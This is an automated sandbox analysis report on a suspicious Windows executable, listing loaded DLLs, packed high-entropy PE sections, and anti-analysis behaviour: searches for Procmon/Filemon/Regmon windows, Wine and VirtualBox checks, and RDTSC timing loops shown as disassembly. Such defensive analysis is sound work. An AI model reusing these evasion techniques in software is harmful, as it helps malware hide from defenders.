            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: file.exeStatic file information: File size 1841152 > 1048576
            Source: file.exeStatic PE information: Raw size of ihjtxazo is bigger than: 0x100000 < 0x197e00
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x1c5a4c should be: 0x1cf0c8
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: ihjtxazo
            Source: file.exeStatic PE information: section name: tktzhwro
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DDD push edx; iretd 0_3_05CF4DEA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05CF4DFB push ecx; iretd 0_3_05CF4E02
            Source: file.exeStatic PE information: section name: entropy: 7.978780458384677
            Source: file.exeStatic PE information: section name: ihjtxazo entropy: 7.953905732453634

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C173 second address: A9C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C177 second address: A9C181 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C181 second address: A9B942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a cmc 0x0000000b push dword ptr [ebp+122D06C5h] 0x00000011 sub dword ptr [ebp+122D1FBFh], ebx 0x00000017 call dword ptr [ebp+122D2026h] 0x0000001d pushad 0x0000001e mov dword ptr [ebp+122D1FBFh], esi 0x00000024 xor eax, eax 0x00000026 jg 00007F82E8EDE51Ch 0x0000002c or dword ptr [ebp+122D1FBFh], edx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 mov dword ptr [ebp+122D1FBFh], esi 0x0000003c jo 00007F82E8EDE51Ch 0x00000042 add dword ptr [ebp+122D19B4h], edi 0x00000048 mov dword ptr [ebp+122D2985h], eax 0x0000004e xor dword ptr [ebp+122D201Dh], eax 0x00000054 mov esi, 0000003Ch 0x00000059 add dword ptr [ebp+122D23B6h], ecx 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 mov dword ptr [ebp+122D1853h], edx 0x00000069 lodsw 0x0000006b mov dword ptr [ebp+122D35B2h], edx 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 jns 00007F82E8EDE522h 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f mov dword ptr [ebp+122D201Dh], ecx 0x00000085 nop 0x00000086 jo 00007F82E8EDE522h 0x0000008c jnc 00007F82E8EDE51Ch 0x00000092 push eax 0x00000093 push eax 0x00000094 push edx 0x00000095 jl 00007F82E8EDE518h 0x0000009b push ecx 0x0000009c pop ecx 0x0000009d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B942 second address: A9B957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6191h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C130AF second address: C130E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F82E8EDE520h 0x00000011 js 00007F82E8EDE51Eh 0x00000017 push esi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jne 00007F82E8EDE516h 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CDDC second address: C0CDF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F82E84F618Eh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CDF0 second address: C0CE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F82E8EDE522h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CE0F second address: C0CE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jng 00007F82E84F618Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CE1E second address: C0CE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1209E second address: C120B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F82E84F6192h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12210 second address: C1221D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F82E8EDE51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C124A8 second address: C124DB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F82E84F61A9h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C124DB second address: C124E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1263A second address: C1268B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6195h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F82E84F618Ah 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jns 00007F82E84F618Ch 0x00000019 popad 0x0000001a js 00007F82E84F61A6h 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jmp 00007F82E84F6196h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12800 second address: C12812 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F82E8EDE516h 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12812 second address: C1281C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F82E84F618Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C143C4 second address: C143C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1456F second address: C1457E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1457E second address: C145CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F82E8EDE527h 0x00000008 jmp 00007F82E8EDE520h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jno 00007F82E8EDE520h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jl 00007F82E8EDE518h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C145CB second address: C14632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F82E84F6186h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 jmp 00007F82E84F618Ch 0x0000001c popad 0x0000001d pop eax 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F82E84F6188h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 jc 00007F82E84F6192h 0x0000003e je 00007F82E84F618Ch 0x00000044 mov dword ptr [ebp+122D235Ah], eax 0x0000004a lea ebx, dword ptr [ebp+1244C2C2h] 0x00000050 cmc 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jp 00007F82E84F6188h 0x0000005a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C146C7 second address: C146CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C146CC second address: C146E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6194h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C146E4 second address: C147C4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 0453B0BBh 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F82E8EDE518h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000003h 0x0000002f mov dword ptr [ebp+122D23B6h], ebx 0x00000035 push 00000000h 0x00000037 jmp 00007F82E8EDE51Ch 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F82E8EDE518h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Dh 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 jmp 00007F82E8EDE526h 0x0000005d mov dword ptr [ebp+122D35B2h], esi 0x00000063 call 00007F82E8EDE519h 0x00000068 jns 00007F82E8EDE524h 0x0000006e push eax 0x0000006f jns 00007F82E8EDE524h 0x00000075 mov eax, dword ptr [esp+04h] 0x00000079 jbe 00007F82E8EDE52Ch 0x0000007f jmp 00007F82E8EDE526h 0x00000084 mov eax, dword ptr [eax] 0x00000086 push edi 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1487E second address: C14888 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14888 second address: C1490A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F82E8EDE518h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D2A91h] 0x0000002a mov ecx, dword ptr [ebp+122D27A9h] 0x00000030 push 00000000h 0x00000032 pushad 0x00000033 mov dword ptr [ebp+122D203Fh], esi 0x00000039 jmp 00007F82E8EDE525h 0x0000003e popad 0x0000003f push 606DBBE4h 0x00000044 pushad 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 jns 00007F82E8EDE516h 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2689E second address: C268A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3688E second address: C368A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a js 00007F82E8EDE51Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C368A9 second address: C368BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F82E84F6186h 0x0000000c jbe 00007F82E84F6186h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3477E second address: C347D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E8EDE521h 0x00000009 pop ecx 0x0000000a jno 00007F82E8EDE51Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F82E8EDE51Eh 0x00000019 js 00007F82E8EDE516h 0x0000001f push esi 0x00000020 pop esi 0x00000021 pushad 0x00000022 jmp 00007F82E8EDE525h 0x00000027 jmp 00007F82E8EDE51Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C347D5 second address: C347DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C347DA second address: C347E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34955 second address: C3495A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3495A second address: C3496D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E8EDE51Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3496D second address: C34984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F82E84F61B1h 0x0000000f jl 00007F82E84F618Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34984 second address: C3498C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34AA9 second address: C34AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34AAD second address: C34AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34D3D second address: C34D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6197h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C352B3 second address: C352BD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F82E8EDE51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C353D8 second address: C353E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C353E0 second address: C3541D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F82E8EDE528h 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F82E8EDE516h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3541D second address: C35422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C35802 second address: C35806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36019 second address: C36025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
